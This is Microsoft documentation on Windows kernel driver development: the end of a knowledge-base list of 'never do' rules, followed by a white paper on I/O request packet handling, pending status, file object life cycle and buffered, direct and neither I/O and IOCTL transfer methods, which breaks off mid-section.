22. Never forget to set the I/O status block in the IRP before calling IoCompleteRequest.
23. Never call IoMarkPending after queuing an IRP or sending it to another driver (IoCallDriver). The IRP may be completed before the driver calls IoMarkPending and a bugcheck might occur. For drivers with completion routines, the completion routines must call IoMarkPending if Irp->PendingReturned is set.
24. Never touch an IRP after you have called IoCompleteRequest on it.
25. Never call IoCancelIrp on an IRP that is not owned by your driver unless you know that the IRP has not been completed yet.
26. Never call IoCancelIrp for the IRP that your dispatch routine is working on until your dispatch routine returns to caller.
27. Never call IoMakeAssociatedIrp to create IRPs for lower drivers from an intermediate driver. The IRP you get in your intermediate driver could be an associated IRP, and you cannot associate other IRPs to an already associated IRP.
28. Never call IoMakeAssociatedIrp on an IRP that is set up to perform buffered I/O.
29. Never simply dereference virtual pointers to device I/O registers and access them. Always use correct hardware abstraction layer (HAL) functions to access a device.
30. Never access IRP or device object fields from an ISR that may be modified from DISPATCH_LEVEL. On a symmetric multiprocessor system this can cause data corruption.
31. Never modify data while running at high-IRQL if that data may be written by low-IRQL code. Use the KeSynchronizeExecution routine.
32. Never acquire one of the driver’s own spin locks (if you have any) in your DispatchCleanup routine, before acquiring the system-wide cancel spin lock (IoAcquireCancelSpinLock). Following a consistent lock acquisition hierarchy throughout your driver is essential to avoiding potential deadlocks.
33. Never call IoAcquireCancelSpinLock in your cancel routine because it is always called with the system cancel spin lock held on its behalf.
34. Never forget to call IoReleaseCancelSpinLock before returning from a cancel routine.
35. Never use IRQL-based synchronization because this works only on single processor systems. Raising IRQL on one processor does not mask interrupts on other processors.
36. Never use RtlCopyMemory for overlapped memory address ranges. Use RtlMoveMemory.
37. Never assume page sizes are constant, even for a given CPU. Use PAGE_SIZE and other page related constants defined in header files to maintain portability.
38. Never access any registry keys other than Registry\Machine\Hardware and Registry\Machine\System from DriverEntry routine of a driver loaded in Boot\System Initialization phase.
39. Never create an Enum key for loading a driver under a driver’s registry key (Registry\Machine\System\CurrentControlSet\Services). The system creates this key dynamically.
40. Never attempt to initialize a physical device without claiming the necessary bus-relative I/O ports, memory ranges, interrupt, or direct memory access (DMA) channel/port hardware resources in the registry first.
41. Never call IoRegisterDriverReinitialization from your DriverEntry routine unless it returns STATUS_SUCCESS.
42. Never call KeSetEvent with the Wait parameter set to TRUE from a pageable thread or pageable driver routine that runs at IRQL PASSIVE_LEVEL. This type of call causes a fatal page fault if your routine happens to be paged out between the calls to KeSetEvent and KeWait..Object(s).
43. Never call KeReleaseSemaphore with the Wait parameter set to TRUE from a pageable thread or pageable driver routine that runs at IRQL PASSIVE_LEVEL. If your routine happens to be paged out between the calls to KeReleaseSemaphore and KeWait..Object(s), this type of a call causes a fatal page fault.
44. Never call KeReleaseMutex with the Wait parameter set to TRUE from a pageable thread or pageable driver routine that runs at IRQL PASSIVE_LEVEL. If your routine happens to be paged out between the calls to KeReleaseMutex and KeWait..Object(s), this type of a call causes a fatal page fault.
45. Never call KeBugCheckEx or KeBugCheck from a retail Windows NT driver to bring down the system, unless the error encountered is a critical error which would corrupt system memory or eventually cause the system to bugcheck. Always try to handle error conditions gracefully.
46. Never assume that an IoTimer routine will be called precisely on a one- second boundary because the intervals at which any particular IoTimer routine is called ultimately depends on resolution of the system clock.
47. Never call Win32s application programming interfaces (API) from a kernel-mode device driver.
48. Never use recursive functions that can cause the stack to overflow because the calling thread’s kernel-mode stack does not grow dynamically while it is running in kernel-mode.
49. Never use interrupt object pointers (PKINTERRUPT) to identify interrupts in an ISR that handles more than one interrupt, because the address of the interrupt object you get in the ISR will not always be the same as the one you got from IoConnectInterrupt. You should only use the ServiceContext value that you specify in IoConnectInterrupt to identify the current interrupting device.
50. Never unload a driver without clearing CustomTimerDpc (KeCancelTimer). If the DPC is fired after the driver is unloaded, it could hit non existent-code and cause the system to bugcheck.
51. Never unload a driver until all the IRPs that have the I/O CompletionRoutine of the driver set in it are completed. If the IRP gets completed by the lower driver after your driver is unloaded, the system could try to execute the non-existent code and cause the system to crash.
52. Never enable device interrupt until your driver is ready to handle it. You should enable only after your driver is completely initialized, and it is safe for the system to touch the driver’s internal structures in ISR and DPC.
53. Never call outside of your driver while holding a spinlock because it can cause deadlock.
54. Never return any status other than STATUS_MORE_PROCESSING_REQUIRED from your I/O CompletionRoutine for an IRP created by your driver with IoBuildAsynchronousFsdRequest/IoAllocateIrp because the IRP is not prepared for completion related post-processing by the I/O manager. Such an IRP should be freed explicitly (IoFreeIrp) by the driver. If the IRP is not meant for reuse, it can be freed in the CompletionRoutine before returning status STATUS_MORE_PROCESSING_REQUIRED.
55. Never allocate an IRP with IoBuildSynchronousFsdRequest/IoBuildDeviceIoControlRequest in an Arbitrary thread context because the IRP remains associated with the thread (Irp->ThreadListEntry) until it is freed.
56. Never call IoInitializeIrp on an IRP that has been allocated with IoAllocateIrp with ChargeQuota parameter set to TRUE. When you allocate an IRP with ChargeQuota set to TRUE, the I/O manager keeps the information about the pool from which it allocated the memory for the IRP in the IRP’s internal flag.

When you call IoInitializeIrp on such an IRP, the allocation pool information is lost as this function blindly zeros the entire IRP. This leads to memory corruption when you free the IRP. Also, never reuse an IRP that comes from the IO manager. If you want to reuse an IRP, you should allocate your own by using IoAllocateIrp.
57. Never specify WaitMode as UserMode in KeWaitForSingleObject/KeWaitForMultipleObjects if the Object is allocated in the calling thread’s stack. The corollary of this is that if the Object being waited on is created in the function stack, you must specify KernelMode as the WaitMode to prevent the thread stack from being paged out.
58. Never acquire resources such as ERESOURCES and FastMutex(Unsafe) in the context of a user-mode thread without protecting the code in a critical section.

Because the acquisition of these resources does not raise the IRQL to APC_LEVEL, if the thread is suspended (done by queuing an APC) after it has acquired the resource, it could cause deadlock and compromise system security. Therefore, you should acquire such resources either by explicitly raising the IRQL to APC_LEVEL or in a critical section by calling KeEnterCriticalRegion.


REFERENCES

MSDN Device Driver Design guide for Windows NT


APPLIES TO
Microsoft Win32 Device Driver Kit for Windows NT 3.51
Microsoft Win32 Device Driver Kit for Windows NT 4.0
Keywords: 
kbinfo KB186775

Handling IRPs: What Every Driver Writer Needs to Know

Microsoft Corporation

July 2004

Applies to:
   Microsoft Windows 2000
   Microsoft Windows XP
   Microsoft Windows Server 2003
   Microsoft Windows codenamed "Longhorn"

Summary: This paper presents an overview of the I/O request packet (IRP) mechanism that is used in the Microsoft Windows family of operating systems. It is intended to provide driver writers with a greater understanding of how I/O works in the operating system, and how their drivers should manage and respond to I/O requests. (19 printed pages)

Contents

Introduction
Definition 1: IRP as a Container for an I/O Request
Definition 2: IRP as a Thread-Independent Call Stack
Passing an IRP to the Next Lower Driver
Completing an IRP
Synchronous I/O Responses
Asynchronous I/O Responses
Life Cycle of a File Object
Data Transfer Mechanisms
I/O Control Codes (IOCTLs)
Success, Error, and Warning Status for IRP Completion
Building IRPs
Debugging I/O Problems
Call to Action and Resources

Introduction

The Microsoft Windows family of operating systems communicates with drivers by sending input/output (I/O) request packets (IRPs). The data structure that encapsulates the IRP not only describes an I/O request, but also maintains information about the status of the request as it passes through the drivers that handle it. Because the data structure serves two purposes, an IRP can be defined as:

  • a container for an I/O request,

    – or –

  • a thread-independent call stack.

Considering IRPs from these two perspectives may help driver writers understand what their drivers must do to respond correctly to I/O requests.

For current documentation on routines and issues discussed in this paper, see the most recent version of the Microsoft Windows Driver Development Kit (DDK).

Definition 1: IRP as a Container for an I/O Request

The operating system presents most I/O requests to drivers using IRPs. IRPs are appropriate for this purpose because:

  • IRPs can be processed asynchronously.
  • IRPs can be cancelled.
  • IRPs are designed for I/O that involves more than one driver.

The IRP data-structure packages the information that a driver requires to respond to an I/O request. The request might be from user mode or from kernel mode; regardless of the request’s origin, a driver requires the same information.

Every IRP has two parts, shown in Figure 1:

  • A header that describes the primary I/O request.
  • An array of parameters that describe subordinate requests (sometimes called sub-requests).

Figure 1. Structure of an IRP

The size of the header is fixed and is the same for every IRP. The size of the array of parameters depends on the number of drivers that will handle the request.

Contents of the IRP Header

An IRP is usually handled by a stack of drivers. The header of each IRP contains data that is used by each driver handling the IRP. While a given driver is handling an IRP, that driver is considered to be the current owner of the IRP.

The header of each IRP contains pointers to the following:

  • Buffers to read the input and write the output of the IRP.
  • A memory area for the driver that currently owns the IRP.
  • A routine, supplied by the driver that currently owns the IRP, which the operating system calls if the IRP is cancelled.
  • The parameters for the current sub-request.
  • In addition to the pointers, the IRP header contains other data that describes the nature and state of the request.

IRP Parameters

Following the IRP header is an array of sub-requests. An IRP can have more than one sub-request because IRPs are usually handled by a stack of drivers. Each IRP is allocated with a fixed number of such sub-requests, usually one for each driver in the device stack. This number typically matches the StackSize field of the top device object in the stack, though a driver in the middle of a stack could allocate fewer. If a driver must forward a request to a different device stack, it must allocate a new IRP.

Each sub-request is represented as an I/O stack location (a structure of type IO_STACK_LOCATION), and the IRP typically contains one such I/O stack location for each driver in the device stack to which the IRP is sent. A field in the IRP header identifies the I/O stack location that is currently in use. The value of this field is called the IRP stack pointer or the current stack location.

The IO_STACK_LOCATION structure includes the following:

  • The major and minor function codes for the IRP.
  • Arguments specific to these codes.
  • A pointer to the device object for the corresponding driver.
  • A pointer to an IoCompletion routine if the driver has set one.
  • A pointer to the file object associated with the request.
  • Various flags and context areas.

The IO_STACK_LOCATION does not contain the pointers to the input and output locations; these pointers are in the IRP itself. All the sub-requests operate on the same buffers.

Definition 2: IRP as a Thread-Independent Call Stack

Performing an I/O operation typically requires more than one driver for a device. Each driver for a device creates a device object, and these device objects are organized hierarchically into a device stack. IRPs are passed down the device stack from one driver to the next. For each driver in the stack, the IRP contains a pointer to an I/O stack location. Because the drivers can handle the requests asynchronously, an IRP is similar to a thread-independent call stack, as Figure 2 shows.

Figure 2. IRP as thread-independent call stack

On the left side of Figure 2, the thread stack shows how the parameters and return address for drivers A, B, and C might be organized into a call stack. On the right, the figure shows how these parameters and return addresses correspond to the I/O stack locations and IoCompletion routines in an IRP.

The asynchronous nature of IRP handling is critical to the operating system and the Windows Driver Model (WDM). In a synchronous, single-threaded I/O design, the application that issues a request, and each driver through which the request passes, must wait until all lower components have completed the request. Such a design uses system resources inefficiently, thus decreasing system performance.

The structure of the IRP provides for an inherently asynchronous design, enabling applications to queue one or more I/O requests without waiting. While the I/O request is in progress, the application thread is free to perform calculations or queue additional I/O requests. Because all the information required to process the request is encapsulated in the IRP, the requesting thread’s call stack can be decoupled from the I/O request.

Passing an IRP to the Next Lower Driver

Passing an IRP to the next lower driver (also called forwarding an IRP) is the IRP equivalent of a subroutine call. When a driver forwards an IRP, it must populate the next I/O stack location with parameters, advance the IRP stack pointer, and invoke the next driver’s dispatch routine. In essence, the driver is calling down the IRP stack.

To pass an IRP, a driver typically takes the following steps:

  1. Set up the parameters for the next I/O stack location. The driver can either:
    • Call the IoGetNextIrpStackLocation routine to get a pointer to the next I/O stack location, and then copy the required parameters to that location.
    • Call the IoCopyCurrentIrpStackLocationToNext routine (if the driver sets an IoCompletion routine in step 2), or the IoSkipCurrentIrpStackLocation routine (if the driver does not set an IoCompletion routine in step 2) to pass the same parameters used for the current location.

    Note   Drivers must not use the RtlCopyMemory routine to copy the current parameters. This routine copies the pointer to the current driver’s IoCompletion routine, thus causing the IoCompletion routine to be called more than once.

  2. Set an IoCompletion routine for post-processing, if necessary, by calling the IoSetCompletionRoutine routine. If the driver sets an IoCompletion routine, it must call IoCopyCurrentIrpStackLocationToNext in step 1.
  3. Pass the request to the next driver by calling the IoCallDriver routine. This routine automatically advances the IRP stack pointer and invokes the next driver’s dispatch routine.

Completing an IRP

When I/O is complete, the driver that completed the I/O calls the IoCompleteRequest routine. This routine moves the IRP stack pointer to point to the next higher location in the IRP stack, as Figure 3 shows.

Figure 3. IRP completion and stack pointer

Figure 3 shows the current I/O stack location after driver C has called IoCompleteRequest. The solid arrow on the left indicates that the stack pointer now points to the parameters and callback for driver B. The dotted arrow indicates the previous stack location. The hollow arrow on the right indicates the order in which the IoCompletion routines are called.

Note   For ease of explanation, this paper shows the I/O stack locations in the IRP "upside-down," that is, in inverted order from A to C instead of from C to A. Using an inverted diagram enables calls that proceed "down" the device stack to point downwards.

If a driver set an IoCompletion routine as it passed the IRP down the device stack, the I/O Manager calls that routine when the IRP stack pointer once again points to the I/O stack location for the driver. In this way, IoCompletion routines act as return addresses for the drivers that handled the IRP as it traversed the device stack.

An IoCompletion routine can return either of two status values:

  • STATUS_CONTINUE_COMPLETION—continues the upward completion of the IRP. The I/O Manager advances the IRP stack pointer and calls the next-higher driver’s IoCompletion routine.
  • STATUS_MORE_PROCESSING_REQUIRED—stops the upward completion of the IRP and leaves the IRP stack pointer at its current location. Drivers that return this status usually restart the upward completion of the IRP later by calling the IoCompleteRequest routine.

When every driver has completed its corresponding sub-request, the I/O request is complete. The I/O Manager retrieves the status of the request from the Irp- >IoStatus.Status field, and retrieves the number of bytes transferred from the Irp- >IoStatus.Information field.

Synchronous I/O Responses

Although the Windows operating system is designed for asynchronous I/O, most applications issue synchronous I/O requests.

One way to implement a synchronous I/O design is shown in the following code fragment.

// Register something that will set an event.
// (Not shown)

// Send the IRP down the device stack
IoCallDriver(nextDevice, Irp);

// Wait on an event to be signaled
KeWaitForSingleObject( &event, ... );

// Get the final status
status = Irp- >IoStatus.Status;

This design has a serious problem, however: the KeWaitForSingleObject routine uses the system-wide dispatcher lock. This lock protects the signal state of events, semaphores, and mutexes, and consequently is used frequently throughout the operating system. Requiring the use of this lock for every synchronous I/O operation would unacceptably hinder performance.

To avoid this problem, the IoCallDriver routine was designed to return a status value. If an I/O request is completed synchronously, IoCallDriver returns the completion status returned by the next lower driver. If a request is being processed asynchronously, IoCallDriver returns STATUS_PENDING.

If a request can be completed synchronously, a driver completes the IRP with a status value and returns the same status value from its dispatch routine. Drivers above it in the device stack can get the status in either of two ways:

  • In the dispatch routine, from the value returned by IoCallDriver.
  • In the IoCompletion routine, from the IoStatus.Status field of the IRP.

Figure 4 shows the two ways a driver or application can get the status of an IRP. For ease of explanation, the figure shows the IoCompletion routines in the same I/O stack location as the parameters with which they are called, instead of one location lower.

Figure 4. Status returned by IoCallDriver and available to IoCompletion routine

  • On the left side of Figure 4, the IoCallDriver routine returns the completion status reported by the next lower driver. On the right, the IoCompletion routines read the status from the IoStatus.Status field of the IRP. If the IRP completes synchronously, the IoCompletion routine for each driver is called before IoCallDriver returns, so the status value is available to the IoCompletion routine before it is available to the dispatch routine.
  • Figure 4 shows that driver C returns STATUS_SUCCESS, driver B returns STATUS_RETRY, and driver A returns STATUS_ERROR. The final status of the IRP is available only to the initiator of the request; other drivers can read only the status returned by the next-lower driver.

Because a driver returns STATUS_PENDING to indicate that an IRP will be completed asynchronously, drivers can determine which responses are synchronous and which are asynchronous. Therefore, an application’s request for synchronous I/O can be coded as follows.

// Register something that will set an event.
// (Not shown)

// Send the IRP down the device stack
status = IoCallDriver(nextDevice, Irp);

if (status == STATUS_PENDING){
    // Wait on an event to be signaled
    KeWaitForSingleObject( &event, ... );

    // Get the final status
    status = Irp- >IoStatus.Status;
}

In this design, the KeWaitForSingleObject routine is called only if the request returns STATUS_PENDING. Therefore, the dispatcher lock is used only if the response is essentially asynchronous.

Asynchronous I/O Responses

A driver should return STATUS_PENDING from a dispatch routine when it cannot complete an I/O request synchronously in a timely manner. Understanding when to return STATUS_PENDING is a problem for many driver writers.

A driver must return STATUS_PENDING if:

  • Its dispatch routine for an IRP might return before the IRP is completed.
  • It completes the IRP on another thread.
  • The dispatch routine cannot determine the IRP’s completion status before it returns.

The driver must call the IoMarkIrpPending macro before it releases control of the IRP and before it returns STATUS_PENDING. IoMarkIrpPending sets the SL_PENDING_RETURNED bit in the Control field of the current I/O stack location. Each time an I/O stack location is completed, the I/O Manager copies the value of this bit to the Irp- >PendingReturned field in the IRP header, as Figure 5 shows.

Figure 5. Propagating the pending bit

In Figure 5, Driver C’s call to the IoMarkIrpPending macro sets the SL_PENDING_RETURNED bit in the Control field of Driver C’s I/O stack location. When Driver C completes the IRP, the I/O Manager changes the IRP stack pointer to point to driver B, and propagates the value of the SL_PENDING_RETURNED bit to the PendingReturned field in the IRP header.

IoCompletion Routines and Asynchronous I/O Responses

If a driver sets an IoCompletion routine for an IRP, the IoCompletion routine can check the value of the Irp- >PendingReturned field to determine whether the IRP will be completed asynchronously.

If the value of the Irp- >PendingReturned field is TRUE, the IoCallDriver routine will return (or has already returned) STATUS_PENDING. If Irp- >PendingReturned is FALSE, IoCallDriver has already returned with the value in the Irp- >IoStatus.Status field. IoCompletion routines for intermediate drivers can similarly test Irp- >PendingReturned to determine how the result of their forwarded request is being handled.

Drivers that complete I/O requests asynchronously sometimes must perform additional processing as the IRP moves back up the device stack. The following code sets an IoCompletion routine when it forwards an IRP to the next lower driver, then waits on an event. Thus, it handles an asynchronous response in the same manner as a synchronous one.

KeInitializeEvent(&event, NotificationEvent, FALSE);

// Set a completion routine that will catch the IRP
IoSetCompletionRoutine(Irp, CatchIrpRoutine, &event, ...);

// Send the IRP down
status = IoCallDriver(nextDevice, Irp);

if (status == STATUS_PENDING) {

    // Wait on some event that will be signaled
    KeWaitForSingleObject( &event, ... );

    // Get the final status
    status = Irp- >IoStatus.Status;
}

The following code shows the IoCompletion routine set in the preceding fragment.

NTSTATUS
CatchIrpRoutine(
    IN PDEVICE_OBJECT    DeviceObject,
    IN PIRP      Irp,
    IN PKEVENT   Event
    )
{
    if (Irp- >PendingReturned) {

        // Release waiting thread
        KeSetEvent( Event, IO_NO_INCREMENT, FALSE );
    }

    return STATUS_MORE_PROCESSING_REQUIRED;
}

The IoCompletion routine tests the value the Irp- >PendingReturned field. Based on this value, it sets an event only if STATUS_PENDING has been or will be returned to the caller. This avoids a call to the KeSetEvent routine, which uses the system-wide dispatcher lock.

The IoCompletion routine returns STATUS_MORE_PROCESSING_REQUIRED. This status indicates to the I/O Manager that the current driver must perform additional processing while it owns the IRP. The I/O Manager stops the upward completion of the IRP, leaving the I/O stack location in its current position. The current driver still owns the IRP and can continue to process it in another routine. When the driver has completely processed the IRP, it should call the IoCompleteRequest routine to continue IRP completion.

Propagating the Pending Bit

Any time a driver handling an I/O request returns the response of the next-lower driver, the value of the pending bit in its I/O stack location (SL_PENDING_RETURNED in the Control field of the IO_STACK_LOCATION structure) must be the same as that of the next-lower driver. If the driver does not set an IoCompletion routine, the I/O Manager automatically propagates the value of the bit, freeing the driver of this responsibility. If the driver sets an IoCompletion routine, however, and the next-lower driver returns STATUS_PENDING, the current driver must mark its own I/O stack location as pending. For example,

// Forward request to next driver
IoCopyCurrentIrpStackLocationToNext( Irp );

// Send the IRP down
status = IoCallDriver( nextDevice, Irp );

// Return the lower driver's status
return status;
 

Because this example does not set an IoCompletion routine, the driver must not call the IoMarkIrpPending macro. The driver simply returns the same status as the next-lower driver, and the I/O Manager copies the value of the pending bit.

If the driver sets an IoCompletion routine, however, this code is insufficient for situations in which the lower driver returns STATUS_PENDING. In such situations, the driver must call the IoMarkIrpPending macro to set the SL_PENDING_RETURNED bit for its own I/O stack location. The driver must call IoMarkIrpPending from an IoCompletion routine; it must not make this call from its dispatch routine. Thus, the following code is incorrect.

// Forward request to next driver
IoCopyCurrentIrpStackLocationToNext( Irp );

// Send the IRP down
status = IoCallDriver( nextDevice, Irp );

// The following is an error because this driver
// no longer owns the IRP.
If (status == STATUS_PENDING) {

    IoMarkIrpPending( Irp );
}

// Return the lower driver's status
return status;

This approach is incorrect because IoMarkIrpPending operates on the current I/O stack location. After IoCallDriver passes the IRP to the next lower driver, the current driver no longer owns the IRP. Thus, when the call to IoMarkIrpPending is executed, there is no current I/O stack location; in fact, if a lower driver completed the IRP, then the pointer is no longer valid. To avoid this problem, the driver must call IoMarkIrpPending from an IoCompletion routine. For example,

NTSTATUS
CompletionRoutine( ... )
{
   if (Irp- >PendingReturned) {

      // Return the lower driver's result. If the
      // lower driver marked its stack location pending,
      // so do we.
      IoMarkIrpPending( Irp );
   }

... //additional processing in IoCompletion routine

   return STATUS_CONTINUE_COMPLETION;
}

Drivers should use this code sequence only when returning the same status as the lower driver. If the driver does not set an IoCompletion routine, the I/O Manager automatically propagates the value of the SL_PENDING_RETURNED bit upwards to the next I/O stack location. A driver is not required to use an IoCompletion routine simply to call IoMarkIrpPending, but if a driver does have an IoCompletion routine, and a lower driver returns STATUS_PENDING, the IoCompletion routine must call IoMarkIrpPending.

Summary of Guidelines for Pending IRPs

Driver writers must follow certain guidelines when handling IRPs for which STATUS_PENDING can be returned. Ignoring these guidelines may cause post-processing to occur twice, resulting in a system crash, or it may prevent post-processing from occurring, resulting in a system hang.

The following are the fundamental guidelines for returning STATUS_PENDING:

  • If a driver returns STATUS_PENDING, it must first call the IoMarkIrpPending macro to mark the I/O stack location as pending.
  • Conversely, if a driver calls IoMarkIrpPending, it must return STATUS_PENDING.

In addition:

  • If a driver returns the same status as the next lower driver and sets an IoCompletion routine, the IoCompletion routine must call IoMarkIrpPending if the value of the Irp- >PendingReturned field is TRUE.
  • If a driver completes an I/O request on a different thread from that on which it received the request, its dispatch routine or IoCompletion routine must call IoMarkIrpPending, and its dispatch routine must return STATUS_PENDING.

Optimizations

By testing the value of the Irp- >PendingReturned field, a driver can take advantage of the pending bit to optimize post-processing work for an I/O request. For example, a driver can use the processor cache efficiently, thus improving throughput, by post-processing the IRP after the IoCallDriver routine returns a synchronous response. The logic of such an optimization is as follows:

  • In a synchronous I/O response, the thread that initiated the I/O request can perform post-processing if IoCallDriver does not return STATUS_PENDING. In this case, the IRP is complete when IoCallDriver returns, so the dispatch routine can perform any required processing.
  • In an asynchronous I/O response, the IoCompletion routine should perform the post-processing if IoCallDriver returns STATUS_PENDING. The IoCompletion routine must test the value of Irp- >PendingReturned, as described in IoCompletion Routines and Asynchronous I/O Responses earlier in this paper. If the value of Irp- >PendingReturned is TRUE, the IoCompletion routine performs the required post-processing.

The operating system uses this exact technique for read requests, write requests, and some I/O control codes (IOCTLs). Consequently, if a driver fails to follow the guidelines in Summary of Guidelines for Pending IRPs earlier in this paper, the operating system will perform post-processing twice or not at all.

Life Cycle of a File Object

A file object is created each time a device is opened. Each file object represents a single use of an individual file, and maintains state information for that use (such as current file offset). When the I/O Manager creates and opens a file object, it creates a handle to refer to the object. The IRP_MJ_CREATE, IRP_MJ_CLEANUP, and IRP_MJ_CLOSE requests define the life cycle of a file object.

IRP_MJ_CREATE Requests

An IRP_MJ_CREATE request notifies the driver that a new file object has been created. The I/O Manager typically sends an IRP_MJ_CREATE request when a user-mode application calls the CreateFile function or a kernel-mode driver calls the ZwCreateFile routine.

In an IRP_MJ_CREATE request, the current I/O stack location contains a FileObject structure, which identifies the file object to open. The FileObject structure specifies:

  • The name of the file to open in the FileObject- >FileName field.
  • Two pointers for driver use in the FileObject- >FsContext and FileObject- >FsContext2 fields.

Note   In a WDM device stack, only the functional device object (FDO) can use the two context pointers. File system drivers use special functions to share these fields among multiple drivers.

IRP_MJ_CREATE requests arrive in the context of the thread and the process that opened or created the file. A driver can record per-caller information, if required.

In response to a create request, the operating system checks access rights as follows:

  • If the request does not include a file name, the operating system checks the rights against the ACL for the device object opened by name.
  • If the request includes a file name, the operating system checks security only if the FILE_DEVICE_SECURE_OPEN characteristic is set in the DeviceObject- >Characteristics field. Otherwise, the driver is responsible for checking security.

If the request succeeds, the operating system saves the granted rights in the handle to the object, for use in subsequent I/O requests. For detailed information on driver security, see the Microsoft Windows Driver Development Kit (DDK).

IRP_MJ_CLEANUP Requests

An IRP_MJ_CLEANUP request notifies a driver that the last handle to a file object has been closed. This request does not indicate that the file object has been deleted.

The I/O Manager sends an IRP_MJ_CLEANUP request for a file object after the last handle to the object is closed. When a driver receives an IRP_MJ_CLEANUP request, the driver must complete any pending IRPs for the specified file object. After the IRPs have been completed, the I/O Manager destroys the file object. While the IRPs are pending, the I/O Manager cannot delete the object.

IRP_MJ_CLEANUP requests arrive in the context of the caller that attempts to close the last handle. If the driver recorded any information about the caller when the IRP_MJ_CREATE request arrived, it should release that information when it processes the IRP_MJ_CLEANUP request. If the file handle has been duplicated, however, the context for the IRP_MJ_CLEANUP request might not be the same as that for the corresponding IRP_MJ_CREATE request. Consequently, driver writers must be careful to determine the appropriate context when using process information during cleanup operations.

For example, an application can call the DuplicateHandle() function to duplicate a file handle into another process. If the new handle is closed last, after all the handles in the original process, the driver will receive an IRP_MJ_CLEANUP request on a handle in the new process context. The context still represents the caller, but it is not the same as the original caller that created the file object.

IRP_MJ_CLOSE Requests

An IRP_MJ_CLOSE request notifies a driver that a file object has been deleted.

The I/O Manager sends an IRP_MJ_CLOSE request for a file object when both of the following are true:

  • All handles to the file object are closed.
  • No outstanding references to the object, such as those caused by a pending IRP, remain.

Unlike IRP_MJ_CREATE and IRP_MJ_CLEANUP requests, an IRP_MJ_CLOSE request does not arrive in the context of the caller.

In response to an IRP_MJ_CLOSE request, a driver should reverse whatever actions it performed in response to the corresponding IRP_MJ_CREATE request. Additional tasks depend on the design of the driver and the type of hardware it supports.

Data Transfer Mechanisms

The Windows family of operating systems supports three data transfer mechanisms:

  • Buffered I/O operates on a kernel-mode copy of the user’s data.
  • Direct I/O accesses the user’s data directly through Memory Descriptor Lists (MDLs) and kernel-mode pointers.
  • Method neither I/O (neither buffered nor direct I/O) accesses the user’s data through user-mode pointers.

For standard I/O requests, such as IRP_MJ_READ and IRP_MJ_WRITE, drivers specify which transfer mechanism they support by modifying the value of the DeviceObject- >Flags field soon after creating the device.

Buffered I/O

To receive read and write requests as buffered I/O, the driver sets the DO_BUFFERED_IO flag in the DeviceObject- >Flags field during initialization. When a driver receives a buffered I/O request, the Irp- >AssociatedIrp.SystemBuffer field contains the address of the kernel-mode buffer on which the driver should operate. The I/O Manager copies data from the kernel-mode buffer to the user-mode buffer during a read request, or from the user-mode buffer to the kernel-mode buffer during a write request.

Direct I/O

To receive read and write requests as direct I/O, the driver sets the DO_DIRECT_IO flag in the DeviceObject- >Flags field during initialization. When a driver receives a direct I/O request, the Irp- >MdlAddress field contains the address of an MDL that describes the request buffer. The MDL lists the buffer’s virtual address and size, along with the physical pages in the buffer. The I/O Manager locks these physical pages before issuing the request to the driver, and unlocks them during completion. The driver must not use the user-mode buffer address specified in the MDL; instead, it must get a kernel-mode address by calling the MmGetSystemAddressForMdlSafe macro.

Neither Buffered nor Direct I/O

To receive neither buffered nor direct I/O requests, the driver sets neither the DO_BUFFERED_IO flag nor the DO_DIRECT_IO flag in the DeviceObject- >Flags field. When a driver receives such a request, the Irp- >UserBuffer field contains the address of the data pertaining to the request. Because this buffer is in the user address space, the driver must validate the address before using it. To validate the pointer, a driver calls the ProbeForRead or ProbeForWrite function within a try/except block. The driver must also perform all access to the buffer within a try/except block.

In addition, the driver must copy the data to a safe kernel-mode address in the pool, or on the stack before manipulating it. Copying the data to a kernel-mode buffer ensures that the user-mode caller cannot change the data after the driver has validated it.

Note   For detailed information on probing and on problems commonly seen in driver I/O paths, see Common Driver Reliability Issues.

I/O Control Codes (IOCTLs)

The I/O Manager sends an I/O control code (IOCTL) as part of the IRP for requests other than read or write requests. An IOCTL is a 32-bit control code that identifies an I/O or device operation. Requests that specify IOCTLs can have both input and output buffers.

The operating system supports two types of IOCTLs, which are sent in two different IRPs:

  • IRP_MJ_DEVICE_CONTROL requests can be sent from user mode or kernel mode. These requests are sometimes called public IOCTLs.
  • IRP_MJ_INTERNAL_DEVICE_CONTROL requests can be sent by kernel-mode components only. These requests are typically used for driver-to-driver communication and are sometimes called private IOCTLs.

For an IOCTL, the transfer mechanism is specified in the Method field of the control code. IOCTLs support the following transfer mechanisms:

  • METHOD_BUFFERED
  • METHOD_OUT_DIRECT
  • METHOD_IN_DIRECT
  • METHOD_NEITHER

METHOD_BUFFERED IOCTLs

In a METHOD_BUFFERED IOCTL, like a buffered read or write request, data transfer is performed through a copy of the user’s buffer passed in the Irp- >AssociatedIrp.SystemBuffer field. The lengths of the input and output buffers are passed in the driver’s IO_STACK_LOCATION structure in the Parameters.DeviceIoControl.InputBufferLength field, and the Parameters.DeviceIoControl.OutputBufferLength field. These values represent the maximum number of bytes the driver should read or write in response to the buffered IOCTL.

METHOD_BUFFERED IOCTLs are the most secure IOCTLs, because the buffer pointer is guaranteed to be valid and aligned on a natural processor boundary, and the data in the buffer cannot change.

The I/O Manager does not zero-initialize the output buffer before issuing the request. The driver is responsible for writing either valid data or zeroes in the output buffer, up to the return byte count it specifies in the Irp- >IoStatus.Information field. Failing to write valid data or zeroes could result in returning private kernel data to the user-mode application. Because this data could belong to another user, this error is considered a breach of system security.

METHOD_OUT_DIRECT IOCTLs

An IOCTL that specifies METHOD_OUT_DIRECT or METHOD_DIRECT_TO_HARDWARE represents a read operation from the hardware. METHOD_OUT_DIRECT and METHOD_DIRECT_TO_HARDWARE can be used interchangeably.

In METHOD_OUT_DIRECT requests, the Irp- >AssociatedIrp.SystemBuffer field contains a kernel-mode copy of the requestor’s input buffer. The Irp- >MdlAddress field contains an MDL that describes the requestor’s output buffer. The I/O Manager readies this buffer for the driver to write. As in read and write operations, the driver must call the MmGetSystemAddressForMdlSafe macro to get a kernel-mode pointer to the buffer described by the MDL.

The requestor’s input buffer typically contains a pointer to a command that the driver should interpret or send to the device. The requestor’s output buffer typically is the location to which the driver should transfer the result of the operation.

METHOD_IN_DIRECT IOCTLs

An IOCTL that specifies METHOD_IN_DIRECT or METHOD_DIRECT_FROM_HARDWARE requests a write operation to the hardware. METHOD_DIRECT_FROM_HARDWARE and METHOD_IN_DIRECT can be used interchangeably.

